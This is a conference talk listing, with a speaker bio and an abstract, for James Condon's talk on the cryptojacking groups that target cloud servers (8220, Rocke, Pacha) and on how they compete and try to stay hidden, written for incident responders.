"The Usual Suspects" - James Condon

Описание: "The Usual Suspects: A Look at Threat Actors Targeting the Cloud and their Battle for Superiority"
Speaker: James Condon (Lacework, Inc)
James Condon is Director of Research at Lacework, where he researches various cloud security topics. James is a security veteran with over 10 years of experience in incident response, intelligence analysis, and threat detection. Prior to Lacework, James was Director of Threat Research and Analysis at ProtectWise (acquired by Verizon). Prior to ProtectWise, James was an analyst at Mandiant where he provided network traffic analysis and forensics for several incident response engagements. James got his start in the security industry as a Special Agent in the Air Force Office of Special Investigations.
Abstract:
Do you ever wonder who is behind the cryptojacking attacks targeting the cloud? If you examine a compromised server you will notice multiple attackers creating a chaotic mess of cron jobs, services, processes, and network connections. You will see evidence of different entities attempting to grab a foothold on the victim system. This talk takes a look at the actors and their tactics behind this activity.

Cloud resources make a lucrative target for crypotjacking. To run a successful campaign an attacker must compromise servers and remain persistent long enough to turn a profit. To stay persistent the attacker must evade detection by the owners, typically by installing rootkits, adding multiple forms of persistence, and setting CPU limits to avoid alarms. Once this is complete mission accomplished right? Not quite.

As it turns out cryptojacking is so popular that many actors are competing for the same resources. This results in attackers booting out anyone else that gets in their way. As seen in malicious scripts and binaries, attackers scramble to keep up with other attacker TTPs all while managing infrastructure in hopes that it doesn’t get blacklisted.

This talk will discuss one of the first players to the game, the 8220 mining group, and how they target cloud-native technologies along with traditional applications. The very prolific group, Rocke, whose origins begin by forking an 8220 mining group github repo is examined along with their continually evolving tactics.. The talk also looks at Pacha, a group that adopts the tactics of their competitors while simultaneously disrupting their operations. Here you will learn about these groups and what they are likely to target. This talk is geared towards operators and incident responders who need to detect, prevent and remediate these attacks. It's also geared for those who are curious about what is happening behind the scenes and those who enjoy the quirks of attacker behavior.